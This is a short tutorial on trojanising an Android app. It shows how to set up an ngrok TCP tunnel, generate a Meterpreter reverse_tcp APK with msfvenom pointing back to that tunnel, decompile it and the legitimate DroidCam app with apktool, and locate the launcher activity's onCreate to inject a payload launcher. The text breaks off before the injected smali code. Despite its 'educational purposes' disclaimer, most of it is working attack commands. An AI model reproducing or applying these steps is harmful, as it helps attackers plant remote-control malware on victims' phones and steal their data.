How to bind payload with APK in 2021
Why Android?
DISCLAIMER: This tutorial/software is intended for only educational purposes. It should not be used for illegal activity. The author will not responsible for the use thereof. Don’t be a jerk about it.
Getting Started
- Having a basic knowledge of Linux.
- Running a Debian-based system (Ubuntu, Kali Linux),
- An Original APK, I used DroidCam.
- Apktool, Ngrok, Metasploit installed.
Fire up Ngrok!
unzip /path/to/ngrok.zip
Once ngrok is unzipped you need to make ngrok executable using sudo chmod +x ngrok.
sudo chmod +x ngrok
Now we need to add our ngrok auth token, we can do this by using the command.
./ngrok authtoken <YOUR_AUTH_TOKEN>
Once auth token has been accepted launch ngrok using the command below. You can change the port to whatever port u want to open.
./ngrok tcp 4411
Switching on necessary services
service postgresql start
service apache2 start
Metasploit Part
- Generate android payload
msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=12553 R > payload.apk
Now we have our malicious payload ready!
- Embedding Payload
- Decompiling payload
apktool d -f payload.apk -o payload
Decompiling original
Payload.smali
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
You will see Markup Languages, and both use the familiar tags and attributes. look for a <activity> tag which contains both of these lines you can use CTRL+F to search for the line of code.
We can see that the entry activity is listed as com.dev47apps.droidcam.DroidCam We know this because the XML contains an intent-filter with “android.intent.action.MAIN” within it.
Follow the location, smali>com>dev47apps>droidcam>DroidCam.smali
Open the file in your favorite text editor DroidCam.smali
Modify the Activity EntryPoint Smali File
;→onCreate(Landroid/os/Bundle;)V
When you locate it, paste the following code in the line next to it this will start the payload alongside of the original apk code.